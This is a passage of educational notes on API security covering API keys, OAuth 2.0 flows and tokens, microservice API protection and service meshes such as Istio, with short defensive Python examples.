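    # Compare in constant time so response timing cannot leak key material.
    caller = next((name for key, name in VALID_KEYS.items()
                   if hmac.compare_digest(key, supplied)), None)
    if caller is None:
        abort(401)  # missing or unknown key: deny the request
    return {"caller": caller, "orders": []}  # Flask serializes the dict to JSON
```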

Key Characteristics and Best Practices:

 Uniqueness: Each API key is unique to a specific application or developer, preventing unauthorized access.
 Security: API keys should be treated as sensitive information. Transmit them over secure channels (e.g., HTTPS) to prevent interception.
 Rotation: Regularly rotate or regenerate API keys to enhance security and limit the impact of compromised keys.
 Usage Limits: Set usage limits on API keys to prevent abuse and control access to resources.
 Scope: Some API keys may be tied to specific scopes or permissions, allowing fine-grained control over the actions a key can perform.

 Revocation: In case of security concerns or when access is no longer needed, API keys should be revocable.

API keys are a convenient and widely used method for authenticating API requests. However,
they might not be suitable for all scenarios, especially when higher security measures like OAuth
or JWT (JSON Web Tokens) are required for more complex authentication and authorization
requirements.

While API keys generally serve as simple authentication tokens, there are different types of API
keys, each with its own characteristics and use cases. The specific types may vary based on the
API provider and the security requirements of the system. Here are some common types:

1. Application-Specific API Keys:
 Description: Each application or developer is assigned a unique API key.
 Use Case: Suitable for scenarios where access control is needed at the application level.
2. User-Specific API Keys:
 Description: Each user is assigned a unique API key.
 Use Case: Often used in applications where individual user accounts need to access specific resources or perform actions.
3. Temporary API Keys:
 Description: API keys with a limited validity period.
 Use Case: Useful for scenarios where temporary access is needed, and regularly rotating keys enhances security.
4. Admin or Master API Keys:
 Description: A single API key with broad access privileges.
 Use Case: Typically used by administrators or trusted entities to perform operations that require extensive permissions.
5. Scoped API Keys:
 Description: API keys with limited access to specific functionalities or resources.
 Use Case: Suitable for situations where fine-grained access control is essential.
6. Environment-Specific API Keys:
 Description: Different API keys for different environments (e.g., development, testing, production).
 Use Case: Helps manage access and monitor usage in different stages of the development lifecycle.
7. IP-Restricted API Keys:
 Description: API keys that are restricted to specific IP addresses.
 Use Case: Enhances security by limiting API access to requests originating from predefined IP addresses.
8. Referer-Specific API Keys:
 Description: API keys restricted based on the referring domain or URL.
 Use Case: Useful for limiting access to specific websites or applications.
9. Resource-Specific API Keys:
 Description: Keys tied to specific resources or endpoints within an API.
 Use Case: Provides a way to control access at a granular level, allowing different keys for different parts of the API.
10. JWT (JSON Web Token) API Keys:
 Description: API keys that are implemented using the JWT standard.
 Use Case: Combines authentication and information about the user or application in a secure token format.

These types of API keys can be used individually or in combination, depending on the complexity
of the system, security requirements, and the level of control needed over API access. It's
important for developers and API providers to choose the appropriate type of API key based on
the specific use case and security considerations.
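
As a sketch of the JWT-based type from the list above, the third-party PyJWT library can issue and verify a signed, scoped, expiring token; the secret, subject, and scope values are hypothetical:

```python
from datetime import datetime, timedelta, timezone

import jwt  # pip install PyJWT

SECRET = "shared-hmac-secret"  # hypothetical; keep real secrets out of source code

# Issue a short-lived, scoped key for a client application.
token = jwt.encode(
    {
        "sub": "client-42",                                      # who holds the key
        "scope": "read:reports",                                 # what it may do
        "exp": datetime.now(timezone.utc) + timedelta(hours=1),  # built-in expiry
    },
    SECRET,
    algorithm="HS256",
)

# On every request, one decode call verifies both the signature and the expiry.
claims = jwt.decode(token, SECRET, algorithms=["HS256"])
print(claims["sub"], claims["scope"])
```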

Advantages:

1. Simplicity:
Advantage: API keys are easy to implement and use, making them a
straightforward method of authentication.
2. Quick Integration:
Advantage: Developers can quickly integrate API keys into their
applications, reducing the time required for setup.
3. Scalability:
Advantage: API keys are scalable, making them suitable for a large
number of clients or applications.
4. Resource Control:
Advantage: API keys can be scoped or limited to specific
functionalities, providing control over the resources a client can access.
5. Ease of Revocation:
Advantage: Revoking access is simple. If a key is compromised or no
longer needed, it can be disabled.

6. Logging and Monitoring:
Advantage: API keys allow for easy tracking and monitoring of usage
patterns, helping in identifying and addressing potential issues.

Disadvantages:

1. Security Risks:
 Disadvantage: API keys can be susceptible to security risks if not
handled properly. If exposed or leaked, they could be misused.
2. Limited Authentication:
 Disadvantage: API keys provide a basic form of authentication and
may not be suitable for scenarios requiring more advanced identity
verification.
3. Difficulty in Key Management:
 Disadvantage: Managing a large number of API keys can become
challenging. Regularly rotating keys and maintaining security can be
complex.

4. Lack of User Context:
Disadvantage: API keys do not inherently carry information about the
user making the request, making it challenging to implement user-
specific functionalities.
5. No Standardization:
Disadvantage: There's no standardized way of implementing API keys.
Practices can vary between providers, leading to inconsistencies.
6. Limited Flexibility:
Disadvantage: API keys might not provide the flexibility needed for
more complex authorization scenarios or workflows.
7. Overhead in Key Distribution:
Disadvantage: Distributing API keys securely to developers or users
can introduce overhead and potential vulnerabilities.
8. Lack of Token Expiry Management:
Disadvantage: Some API key systems may lack built-in mechanisms for
token expiry management, leading to potential security risks.

Considerations:

1. Use Case and Security Requirements:


 Carefully consider the specific use case and security requirements
before choosing API keys as an authentication method.
2. Combined Approaches:
 In some scenarios, combining API keys with additional authentication
methods (e.g., OAuth, JWT) may provide a more robust solution.
3. Regular Key Rotation:
 Implement regular key rotation practices to enhance security.
4. Secure Transmission:
 Always transmit API keys over secure channels (e.g., HTTPS) to prevent
interception.
5. Logging and Monitoring:
 Implement comprehensive logging and monitoring to detect and
respond to suspicious activities related to API keys.
OAuth2
OAuth 2.0 is an open industry-standard authorization protocol that allows a third party to gain limited access to another HTTP service, such as Google, Facebook, or GitHub, on behalf of a user, once the user grants permission, without exposing the user's credentials.
Most websites require you to complete a registration process before you can access their
content. It is likely that you have come across some buttons for logging in with Google,
Facebook, or another service.
Let us now discuss OAuth.

OAuth is an open-standard authorization framework that enables third-party applications to
gain limited access to user’s data.
Essentially, OAuth is about delegated access.
Delegation is a process in which an owner authorizes a service provider to perform certain
tasks on the owner’s behalf. Here the task is to provide limited access to another party.
Let’s take two real-life examples;
House owners often approach real estate agents to sell their house. The house owner
authorizes the real estate agent by giving him/her the key. Upon the owner’s consent, the
agents show the buyers the property. The buyer is welcome to view the property, but they
are not permitted to occupy it. In this scenario, the buyer has limited access, and the access
is limited by the real estate agent who is acting on the owner’s behalf.
A classic example of valet parking is often retold to understand this concept. In this case,
the car owner has access to both the car and the valet. To have his car parked for him, the
car owner gives the valet key to the attendant. The valet key starts the car and opens the
driver’s side door but prevents the valet from accessing valuables in the trunk or glove box.
Thus, the valet key has delegated the task of limiting the access of the valet.

What is the point of OAuth?
OAuth allows granular access levels. Rather than entrusting our entire protected data to a
third party, we would prefer to share just the necessary data with them.
Thus, we need a trusted intermediary that would grant limited access (known as scope) to the editor without revealing the user's credentials, once the user has granted permission (known as consent).
The editing software cannot request your Google account credentials; instead, it redirects
you to your account. If you choose to invite your friend through that app, the app will
request access to your Google address book to send the invitation.
 Read/Write access – A third party can only read your data, not modify it; in some instances, it can also request content modifications on your account. For example, you can cross-post a picture from your Instagram account to your Facebook account.
 Revoke Access – You can deauthorize Instagram's access to your Facebook wall so it can no longer post on your wall.
Before we get into how OAuth works, we’ll discuss the central components of OAuth for
more clarity.
The elements of OAuth are listed below:
1. Actors
2. Scopes and Consent
3. Tokens
4. Flows
Actors:
OAuth Interactions have the following Actors:

OAuth2.0 Actors

 Resources are protected data that require OAuth to access them.


 Resource Owner: Owns the data in the resource server. An entity capable of
granting access to protected data. For example, a user Google Drive account.
 Resource Server: The API which stores the data. For example, Google Photos
or Google Drive.
 Client: It is a third-party application that wants to access your data, for
example, a photo editor application.
There seems to be an interaction between two services for accessing resources, but the issue
is who is responsible for the security. The resource server, in this case, Google Drive, is
responsible for ensuring the required authentication.
OAuth is coupled with the Resource Server. Google implements OAuth to validate the
authorization of whoever accesses the resource.
 Authorization Server: OAuth’s main engine that creates access tokens.
Scope and Consent:
The scopes define the specific actions that apps can perform on behalf of the user. They are
the bundles of permissions asked for by the client when requesting a token.
For example, we can share our LinkedIn posts on Twitter via LinkedIn itself. Given that it
has write-only access, it cannot access other pieces of information, such as our
conversations.

On the Consent screen, a user learns who is attempting to access their data and what kind of
data they want to access, and the user must express their consent to allow third-party access
to the requested data. You grant access to your IDE, such as CodingSandbox, when you link
your GitHub account to it or import an existing repository. The GitHub account you are using will send you an email confirming this.

GitHub confirmation Email

Now let’s talk about access and refresh tokens.


What is a token?
A token is a piece of data containing just enough information to be able to verify a user’s
identity or authorize them to perform a certain action.
We can comprehend access tokens and refresh tokens by using the analogy of movie theatres. Suppose you (resource owner) wanted to watch the latest Marvel movie (Shang-Chi and the Legend of the Ten Rings); you'd go to the ticket vendor (auth server), choose the movie, and buy the ticket (token) for that movie (scope). Ticket validity pertains only to a certain time frame and to a specific show. After the security guard checks your
ticket, he lets you into the theatre (resource server) and directs you to your assigned seat.
If you give your ticket to a friend, they can use it to watch the movie. An OAuth access
token works the same way. Anyone who has the access token can use it to make API
requests. Therefore, they’re called “Bearer Tokens”. You will not find your personal
information on the ticket. Similarly, OAuth access tokens can be created without actually
including information about the user to whom they were issued. Like a movie ticket, an
OAuth access token is valid for a certain period and then expires. Security personnel
usually ask for ID proof to verify your age, especially for A-rated movies. Bookings made
online will be authenticated by the app before tickets are provided to you.
So, Access tokens are credentials used to access protected resources. Each token represents
the scope and duration of access granted by the resource owner and enforced by the
authorization server. The format, structure, and method of utilizing access tokens can be
different depending on the resource server’s security needs.
A decoded access token that follows the JWT format:

{
  "iss": "https://YOUR_DOMAIN/",
  "sub": "auth0|123456",
  "aud": [
    "my-api-identifier",
    "https://YOUR_DOMAIN/userinfo"
  ],
  "azp": "YOUR_CLIENT_ID",
  "exp": 1474178924,
  "iat": 1474173924,
  "scope": "openid profile email address phone read:meetings"
}
Now that your showtime has expired and you want to watch another movie, you need to
buy a new ticket. Upon your last purchase, you received a Gift card that is valid for three
months. You can use this card to purchase a new ticket. In this scenario, the gift card is
analogous to Refresh Tokens. A Refresh token is a string issued to the client by the
authorization server and is used to obtain a new access token when the current access token
becomes invalid.
They do not refresh an existing access token, they simply request a new one. The expiration
time for refresh tokens tends to be much longer than for access tokens. In our case, the gift
card is valid for three months, while the ticket is valid for two hours. Unlike the original
access token, it contains less information.
Let us now look at how OAuth works when uploading a picture to a photo editor to
understand the workflow.
1. The resource owner or user wishes to resize the image, so he goes to the editor (client), tells the client that the image is in Google Drive (resource server), and asks the client to bring it for editing.
2. The client sends a request to the authorization server to access the image. The
server asks the user to grant permissions for the same.
3. Once the user allows third-party access and logs into the website using Google,
the authorization server sends a short-lived authorization code to the client.
4. Clients exchange auth codes for access tokens, which define the scope and
duration of user access.
5. The Authorization Server validates the access token, and the editor fetches the
image that the user wants to edit from their Google Drive account.
An overview of the OAuth workflow

1. Authorization Code Flow:

Authorization code flow
1. The client requests authorization by directing the resource owner to the
authorization server.
2. The authorization server authenticates the resource owner and informs the user
about the client and the data requested by the client. Clients cannot access user
credentials since authentication is performed by the authentication server.
3. Once the user grants permission to access the protected data, the
authorization server redirects the user to the client with the temporary
authorization code.
4. The client requests an access token in exchange for the authorization code.
5. The authorization server authenticates the client, verifies the code, and will
issue an access token to the client.
6. Now the client can access protected resources by presenting the access token
to the resource server.
7. If the access token is valid, the resource server returns the requested
resources to the client.
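
The steps above can be sketched in Python with the requests library. Every URL, client ID, and scope here is a hypothetical placeholder rather than a real provider's endpoint, and the state parameter guards against cross-site request forgery:

```python
import secrets
from urllib.parse import urlencode

import requests  # pip install requests

# Hypothetical registration values obtained from the authorization server.
AUTHORIZE_URL = "https://auth.example.com/authorize"
TOKEN_URL = "https://auth.example.com/token"
CLIENT_ID = "photo-editor"
CLIENT_SECRET = "client-secret"
REDIRECT_URI = "https://editor.example.com/callback"

# Steps 1-2: redirect the user's browser to the authorization endpoint.
state = secrets.token_urlsafe(16)  # stored, then checked when the user returns
auth_request = AUTHORIZE_URL + "?" + urlencode({
    "response_type": "code",
    "client_id": CLIENT_ID,
    "redirect_uri": REDIRECT_URI,
    "scope": "read:photos",
    "state": state,
})
print("Send the user to:", auth_request)

# Steps 4-5: after consent, the server redirects back with ?code=...
def exchange_code(code: str) -> dict:
    """Swap the short-lived authorization code for an access token."""
    resp = requests.post(
        TOKEN_URL,
        data={
            "grant_type": "authorization_code",
            "code": code,
            "redirect_uri": REDIRECT_URI,
        },
        auth=(CLIENT_ID, CLIENT_SECRET),  # step 5: client authentication
    )
    resp.raise_for_status()
    return resp.json()  # access_token, expires_in, possibly refresh_token
```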

2. Implicit Flow:

Implicit Grant flow is an authorization flow for browser-based apps. Implicit Grant Type
was designed for single-page JavaScript applications for getting access tokens without an
intermediate code exchange step. Single-page applications are those in which the page does
not reload and the required contents are dynamically loaded.
Take Facebook or Instagram, for instance. Instagram doesn’t require you to reload your
application to see the comments on your post. Updates occur without reloading the page.
Implicit grant flow is thus applicable in such applications.
The implicit flow issues an access token directly to the client instead of issuing an
authorization code.
The Implicit Grant:
 Constructs a link and redirects the user's browser to that URL.

https://example-app.com/redirect#access_token=g0ZGZmPj4nOWIlTTk3Pw1Tk4ZTKyZGI3&token_type=Bearer&expires_in=400&state=xcoVv98y3kd55vuzwwe3kcq
 If the user accepts the request, the authorization server will return the
browser to the redirect URL supplied by the Client Application with a token
and state appended to the fragment part of the URL. (A state is a string of
unique and non-predictable characters.)
 To prevent cross-site request forgery attacks, the application should test the incoming state value against the value that was originally set, once a redirect is initiated. (We are the target of an attack if we receive a response with a state that does not match.)
 The redirection URI includes the access token, which is sent to the client.
Clients now have access to the resources granted by resource owners.
This flow is deprecated due to the lack of client authentication. A malicious application can
pretend to be the client if it obtains the client credentials, which are visible if one inspects
the source code of the page, and this leaves the owner vulnerable to phishing attacks.
There is no secure backchannel like an intermediate authorization code – all communication
is carried out via browser redirects in implicit grant processing. To mitigate the risk of the
access token being exposed to potential attacks, most servers issue short-lived access
tokens.

3. Resource owner password credentials flow:

In this flow, the owner’s credentials, such as username and password, are exchanged for an
access token. The user gives the app their credentials directly, and the app then utilizes
those credentials to get an access token from a service.
1. Client applications ask the user for credentials.
2. The client sends a request to the authorization server to obtain the access token.
3. The authorization server authenticates the client, determines if it is
authorized to make this request, and verifies the user’s credentials. It
returns an access token if everything is verified successfully.
4. The OAuth client makes an API call to the resource server using the
access token to access the protected data.
5. The resource server grants access.
The Microsoft identity platform, for example, supports the resource owner password
credentials flow, which enables applications to sign in users by directly using their
credentials.
It is appropriate for resource owners with a trusted relationship with their clients. It is not
recommended for third-party applications that are not officially released by the API
provider.

Why Resource Owner Password Credentials Grant Type is not recommended?

1. Impersonation: Someone may pose as the user to request the resource, and there is no way to verify that the owner made the request.
2. Phishing Attacks – A random client application asks the user for credentials directly, instead of redirecting you to your Google account when it requests your Google username and password.
3. The user’s credentials could be leaked maliciously to an attacker.
4. A client application can request any scope it desires from the authorization server.
Despite controlled scopes, a client application may be able to access user
resources without the user’s permission.
For example, in 2017, a fake Google Docs application was used to fool users into thinking
it was a legitimate product offered by Google. The attackers used this app to access users’
email accounts by abusing the OAuth token.

4. Client Credentials Flow:

The Client credentials flow permits a client service to use its own credentials, instead of
impersonating a user to access the protected data. In this case, authorization scope is
limited to client-controlled protected resources.
1. The client application makes an authorization request to the Authorization Server
using its client credentials.
2. If the credentials are accurate, the server responds with an access token.
3. The app uses the access token to make requests to the resource server.
4. The resource server validates the token before responding to the request.
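
A minimal sketch of this flow with the requests library, again using hypothetical endpoints and credentials; note that no user interaction is involved at any point:

```python
import requests  # pip install requests

TOKEN_URL = "https://auth.example.com/token"  # hypothetical
CLIENT_ID = "report-generator"                # hypothetical
CLIENT_SECRET = "client-secret"               # hypothetical

# Steps 1-2: the service authenticates as itself and receives a token.
resp = requests.post(
    TOKEN_URL,
    data={"grant_type": "client_credentials", "scope": "read:stats"},
    auth=(CLIENT_ID, CLIENT_SECRET),  # HTTP Basic client authentication
)
resp.raise_for_status()
token = resp.json()["access_token"]

# Steps 3-4: present the token as a Bearer credential to the resource server.
api = requests.get(
    "https://api.example.com/stats",
    headers={"Authorization": f"Bearer {token}"},
)
print(api.status_code, api.json())
```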

OAuth 2.0 vs OAuth 1.0

The versions of OAuth are not compatible, as OAuth 2.0 is a complete overhaul of OAuth 1.0.
Implementing OAuth 2.0 is easier and faster. OAuth 1.0 had complicated cryptographic
requirements, supported only three flows, and was not scalable.
Now that you know what happens behind the scenes when you forget your Facebook
password, and it verifies you through your Google account and allows you to change it,
or whenever any other app redirects you to your Google account, you will have a better
understanding of how it works.

OAuth 2.0 (OAuth2) is an open standard and protocol designed for secure authorization and
access delegation. It provides a way for applications to access the resources of a user
(resource owner) on a server (resource server) without exposing the user's credentials to the
application. Instead, OAuth2 uses access tokens to represent the user's authorization,
allowing controlled access to protected resources.

Here is a brief explanation of the main components and flow of OAuth2:

Key Components:

1. Resource Owner (User):

 The entity that owns the resource and has the ability to grant access to it.
2. Client (Application):
 The application or service that wants to access the user's resources.
3. Authorization Server:
 Responsible for authenticating the user and issuing access tokens after the user
grants authorization.
4. Resource Server:
 Hosts the protected resources that the client wants to access on behalf of the
user.

OAuth2 Flow:

1. Client Registration:
 The client registers with the authorization server, obtaining a client ID and,
optionally, a client secret.
2. Authorization Request:
 The client initiates the authorization process by redirecting the user to the
authorization server's authorization endpoint, including its client ID,
requested
scope, and a redirect URI.
3. User Authorization:
 The resource owner (user) interacts with the authorization server to grant or
deny access. If granted, the authorization server redirects the user back to the
client
with an authorization code.
4. Token Request:
 The client sends a token request to the authorization server, including the
authorization code received in the previous step, along with its client
credentials
(client ID and secret). In response, the authorization server issues an access
token.
5. Access Protected Resource:
 The client uses the access token to access the protected resources on the
resource server. The token acts as proof of the user's permission.

Grant Types:

OAuth2 supports different grant types, including:

 Authorization Code Grant


 Implicit Grant
 Resource Owner Password Credentials Grant
 Client Credentials Grant

Each grant type is suitable for different use cases and security requirements.

OAuth2 is widely used in scenarios where secure and controlled access to user resources is
required, such as third-party application integrations, mobile app access, and delegated
authorization in distributed systems. It separates the roles of resource owner, client, authorization
server, and resource server to enhance security and user privacy.

Difference between API Keys and OAuth
Going through the three types of security mechanism for an API below makes the difference between API keys and OAuth easy to understand –

1. HTTP Basic Authentication: In this mechanism the HTTP user agent provides a username and password. Since this method depends only on an HTTP header and the entire authentication data is transmitted over the line, it is prone to a man-in-the-middle attack, where an attacker can simply capture the HTTP header and log in using a copy-cat header in a malicious packet. Due to enforced SSL, this scheme is very slow. HTTP Basic Authentication can be used in situations like an internal network where speed is not an issue.
2. API Keys: API keys came into the picture due to the slow speed and highly vulnerable nature of HTTP Basic Authentication. An API key is the code assigned to the user upon API registration or account creation. API keys are generated using a specific set of rules laid down by the authorities involved in API development. This piece of code must be passed whenever the entity (developer, user, or a specific program) makes a call to the API. Despite easy usage and fast speed, they are highly insecure.

The question still remains: why?

The problem is that an API key is a method of authentication, not authorization. API keys are like a username and password, thus providing entry into the system. In general, API keys are placed in any of the following places: the Authorization header, Basic Auth, body data, a custom header, or the query string.
Whenever we make a request, we need to send the API key by placing it in one of the above places. Thus, if at any point the network is compromised, the entire network gets exposed and the API key can be easily extracted.
Once an API key is stolen, it can be used for an indefinite amount of time, unless and until the project owner revokes the API key and generates a new one.
3. OAuth: OAuth is not only a method of authentication or authorization, but a mixture of both. Whenever an API is called using OAuth credentials, the user logs into the system, generating a token. Remember that this token is active for one session only, after which the user has to generate a new token by logging into the system again. After this token is submitted to the server, the user is authorized for roles based on the credentials.
Securing Microservice APIs
A micro-service is a very small, independent process that communicates and returns messages through mechanisms like Thrift, HTTPS, and REST APIs. Basically, micro-services architecture is the combination of lots of small processes which combine to form an application. In micro-services architecture, each process is represented by multiple containers. Each individual service is designed for a specific function, and all services together build an application.
Now let's discuss the actual point of security in micro-service architecture. Nowadays many applications use external services to build their application, and with the greater demand there is a need for quality software development and architecture design. Systems administrators, database administrators, cloud solution providers, and the API gateway are the basic services used by the application.
Security of micro-services mainly focuses on designing secure communication between all the services which are implemented by the application.
How To Secure Micro-services:
(1) Password Complexity:
Password complexity is a very important part where security features are concerned. The mechanism implemented by the developer must be able to force the user to create a strong password during the creation of an account. All the password characters must be checked to avoid weak passwords containing only letters or numbers.
(2) Authentication Mechanism:
Sometimes authentication is not considered a high priority during the implementation of security features. It is important to lock users' accounts after a small number of failed login attempts, and rate limiting must be implemented on login to avoid brute-force attacks. If the application uses any external service, all APIs must carry an authentication token to avoid interference with the user in API endpoint communication. Use multi-factor authentication in micro-services to avoid username enumeration during login and password reset.
(3) Authentication Between Two Services:
A man-in-the-middle attack may be encountered during service-to-service communication. Always use HTTPS instead of HTTP: HTTPS ensures data encryption between two services and also provides additional protection against penetration of the traffic between client and server by external entities.
It is difficult to manage SSL certificates on servers in multi-machine scenarios, and it is very complex to issue certificates to every device. A secure solution, HMAC, is available over HTTPS: an HMAC is a hash-based message authentication code used to sign the request, as sketched below.
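
A minimal sketch of HMAC request signing using only Python's standard library. The shared secret, header names, and five-minute replay window are illustrative choices; the secret would be distributed to both services out of band:

```python
import hashlib
import hmac
import time

SHARED_SECRET = b"32-bytes-of-randomness-goes-here"  # hypothetical shared key

def sign_request(method: str, path: str, body: bytes) -> dict:
    """Produce headers that let the receiving service verify this request."""
    timestamp = str(int(time.time()))  # bounds the replay window
    message = f"{method}\n{path}\n{timestamp}\n".encode() + body
    signature = hmac.new(SHARED_SECRET, message, hashlib.sha256).hexdigest()
    return {"X-Timestamp": timestamp, "X-Signature": signature}

def verify_request(method: str, path: str, body: bytes,
                   timestamp: str, signature: str) -> bool:
    """Recompute the HMAC and compare in constant time."""
    if abs(time.time() - int(timestamp)) > 300:  # reject stale requests
        return False
    message = f"{method}\n{path}\n{timestamp}\n".encode() + body
    expected = hmac.new(SHARED_SECRET, message, hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, signature)

headers = sign_request("POST", "/v1/orders", b'{"item": 7}')
assert verify_request("POST", "/v1/orders", b'{"item": 7}',
                      headers["X-Timestamp"], headers["X-Signature"])
```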
(4) Securing Data at Rest:
It is very important to secure data which is not currently in use. If the environment is secure and the network is secure, we may think that attackers cannot reach stored data, but this is not the case: there are many examples of data breaches in protected systems caused only by weak protection mechanisms on stored data. All the endpoints where data is stored must be non-public. Also, during development take care of API keys: all API keys must be kept secret, since leakage of a private API key also leads to exposure of sensitive data to the public. Don't expose any sensitive data or endpoints in the source code.
(5) Penetration Testing:
It is always good practice to consider security features in the software development life cycle itself, but in practice this is not always done; considering this problem, it is important to do penetration testing on the application after the final release. OWASP has released a set of important attack vectors; always try these attacks during penetration testing of the application. Some of the important attack vectors are mentioned below.
 SQL Injection.
 Cross-Site Scripting (XSS).
 Sensitive Information Disclosure.
 Broken Authentication and Authorization.
 Broken Access Control.

Definition: Securing Microservice APIs is the process of implementing security measures to safeguard the communication channels and data exchanged between individual microservices in a microservices architecture. This includes authentication, authorization, encryption, and other practices to protect against potential vulnerabilities and unauthorized access.

Explanation: In a microservices architecture, software is divided into small, independently deployable services that work together to form a larger application. Each microservice typically exposes an API, allowing other services to interact with it. Securing these APIs is crucial to maintaining the overall security and integrity of the system. Here are key aspects of securing microservice APIs:

1. Authentication:
 Ensure that each microservice authenticates itself before communicating with
other services. This can involve the use of API keys,
tokens, or other authentication mechanisms.
2. Authorization:
 Implement fine-grained access controls to specify what actions each
microservice can perform. This helps prevent unauthorized access to
sensitive resources.
3. Encryption (In Transit and At Rest):
 Use secure communication protocols such as HTTPS to encrypt data in
transit between microservices. Additionally, consider encrypting data at rest to
protect it when stored in databases or other storage systems.
4. API Gateways:

 Introduce an API gateway to centralize security controls, manage access, and
enforce policies across microservices. The API gateway can handle
authentication, rate limiting, and other security-related tasks.
5. Token Management:
 If using tokens for authentication, implement secure token management
practices. Use short-lived tokens and consider token revocation
mechanisms.
6. Logging and Monitoring:
 Implement comprehensive logging to track and monitor API usage. Set up
alerting systems to detect and respond to potential security incidents.
7. Service Mesh for Communication Security:
 Consider using a service mesh for managing communication between
microservices. A service mesh can provide features like mutual TLS,
service identity, and secure communication channels.
8. Container Security:
 Apply security best practices to containers. Regularly update container
images, scan for vulnerabilities, and enforce security policies.
9. Secure Coding Practices:
 Train developers in secure coding practices to write resilient and secure code.
Address common security vulnerabilities such as injection attacks and input
validation issues.
10. Dependency Scanning:
 Regularly scan dependencies for known vulnerabilities. Use tools and
services that automatically check for and alert about vulnerable
dependencies.
11. Regular Security Audits:
 Conduct regular security audits and code reviews to identify and address
potential vulnerabilities. Stay informed about security best practices and
address emerging threats promptly.

Service Mesh

What is a service mesh?

A service mesh is a software layer that handles all communication between services in
applications. This layer is composed of containerized microservices. As applications scale
and the number of microservices increases, it becomes challenging to monitor the
performance of the services. To manage connections between services, a service mesh
provides new features like monitoring, logging, tracing, and traffic control. It’s independent
of each service’s code, which allows it to work across network boundaries and with multiple
service management systems.

Why do you need a service mesh?

In modern application architecture, you can build applications as a collection of small, independently deployable microservices. Different teams may build individual microservices and choose their coding languages and tools. However, the microservices must communicate for the application code to work correctly.

Application performance depends on the speed and resiliency of communication between services. Developers must monitor and optimize the application across services, but it's hard to gain visibility due to the system's distributed nature. As applications scale, it becomes even more complex to manage communications.

There are two main drivers to service mesh adoption, which we detail next.


Service-level observability

As more workloads and services are deployed, developers find it challenging to understand
how everything works together. For example, service teams want to know what their
downstream and upstream dependencies are. They want greater visibility into how services and
workloads communicate at the application layer.

Service-level control

Administrators want to control which services talk to one another and what actions they
perform. They want fine-grained control and governance over the behavior, policies, and
interactions of services within a microservices architecture. Enforcing security policies is
essential for regulatory compliance.

What are the benefits of a service mesh?

A service mesh provides a centralized, dedicated infrastructure layer that handles the
intricacies of service-to-service communication within a distributed application. Next, we
give several service mesh benefits.

Service discovery

Service meshes provide automated service discovery, which reduces the operational load of
managing service endpoints. They use a service registry to dynamically discover and keep
track of all services within the mesh. Services can find and communicate with each other
seamlessly, regardless of their location or underlying infrastructure. You can quickly scale by
deploying new services as required.

Load balancing

Service meshes use various algorithms—such as round-robin, least connections, or weighted load balancing—to distribute requests across multiple service instances intelligently. Load balancing improves resource utilization and ensures high availability and scalability. You can optimize performance and prevent network communication bottlenecks.

Traffic management

Service meshes offer advanced traffic management features, which provide fine-grained
control over request routing and traffic behavior. Here are a few examples.

Traffic splitting

You can divide incoming traffic between different service versions or configurations. The mesh
directs some traffic to the updated version, which allows for a controlled and gradual rollout of
changes. This provides a smooth transition and minimizes the impact of changes.

Request mirroring

You can duplicate traffic to a test or monitoring service for analysis without impacting the
primary request flow. When you mirror requests, you gain insights into how the service
handles particular requests without affecting the production traffic.

Canary deployments

You can direct a small subset of users or traffic to a new service version, while most users
continue to use the existing stable version. With limited exposure, you can experiment with
the new version's behavior and performance in a real-world environment.

Security

Service meshes provide secure communication features such as mutual TLS (mTLS)
encryption, authentication, and authorization. Mutual TLS enables identity verification in
service-to-service communication. It helps ensure data confidentiality and integrity by
encrypting traffic. You can also enforce authorization policies to control which services
access specific endpoints or perform specific actions.
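
From the calling service's point of view, mutual TLS can be sketched in a few lines with the requests library; the certificate file names and internal URL are hypothetical (in a service mesh, the sidecar proxies usually perform this handshake transparently):

```python
import requests  # pip install requests

# client.crt / client.key identify this service to the server;
# ca.crt is the internal certificate authority used to verify the server.
response = requests.get(
    "https://orders.internal.example.com/api/orders",
    cert=("client.crt", "client.key"),  # client certificate: our identity
    verify="ca.crt",                    # validate the server against our CA
)
print(response.status_code)
```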

Monitoring

Service meshes offer comprehensive monitoring and observability features to gain insights
into your services' health, performance, and behavior. Monitoring also supports
troubleshooting and performance optimization. Here are examples of monitoring features
you can use:

 Collect metrics like latency, error rates, and resource utilization to analyze overall
system performance
 Perform distributed tracing to see requests' complete path and timing across
multiple services
 Capture service events in logs for auditing, debugging, and compliance purposes

How does a service mesh work?


A service mesh removes the logic governing service-to-service communication from individual
services and abstracts communication to its own infrastructure layer. It uses several network
proxies to route and track communication between services.

A proxy acts as an intermediary gateway between your organization’s network and the
microservice. All traffic to and from the service is routed through the proxy server. Individual
proxies are sometimes called sidecars, because they run separately but are logically next to
each service. Taken together, the proxies form the service mesh layer.

There are two main components in service mesh architecture—the control plane and the data
plane.

Data plane
The data plane is the data handling component of a service mesh. It includes all the sidecar
proxies and their functions. When a service wants to communicate with another service, the
sidecar proxy takes these actions:

1. The sidecar intercepts the request
2. It encapsulates the request in a separate network connection
3. It establishes a secure and encrypted channel between the source and destination proxies

The sidecar proxies handle low-level messaging between services. They also implement
features, like circuit breaking and request retries, to enhance resiliency and prevent service
degradation. Service mesh functionality—like load balancing, service discovery, and traffic
routing—is implemented in the data plane.

Control plane
The control plane acts as the central management and configuration layer of the service mesh.

With the control plane, administrators can define and configure the services within the mesh. For
example, they can specify parameters like service endpoints, routing rules, load balancing
policies, and security settings. Once the configuration is defined, the control plane distributes the
necessary information to the service mesh's data plane.

The proxies use the configuration information to decide how to handle incoming requests. They
can also receive configuration changes and adapt their behavior dynamically. You can make
real-time changes to the service mesh configuration without service restarts or disruptions.

Service mesh implementations typically include the following capabilities in the control plane:

 Service registry that keeps track of all services within the mesh
 Automatic discovery of new services and removal of inactive services
 Collection and aggregation of telemetry data like metrics, logs, and distributed tracing
information

What is Istio?

Istio is an open-source service mesh project designed to work primarily with Kubernetes.
Kubernetes is an open-source container orchestration platform used to deploy and manage
containerized applications at scale.

Istio's control plane components run as Kubernetes workloads themselves. It uses a Kubernetes Pod—a tightly coupled set of containers that share one IP address—as the basis for the sidecar proxy design.

Istio’s layer 7 proxy runs as another container in the same network context as the main
service. From that position, it can intercept, inspect, and manipulate all network traffic
heading through the Pod. Yet, the primary container needs no alteration or even knowledge
that this is happening.


What are the challenges of open-source service mesh implementations?


Here are some common service mesh challenges associated with open-source platforms like
Istio, Linkerd, and Consul.

Complexity
Service meshes introduce additional infrastructure components, configuration requirements, and
deployment considerations. They have a steep learning curve, which requires developers and
operators to gain expertise in using the specific service mesh implementation. It takes time and
resources to train teams. An organization must ensure teams have the necessary knowledge to
understand the intricacies of service mesh architecture and configure it effectively.

Operational overheads
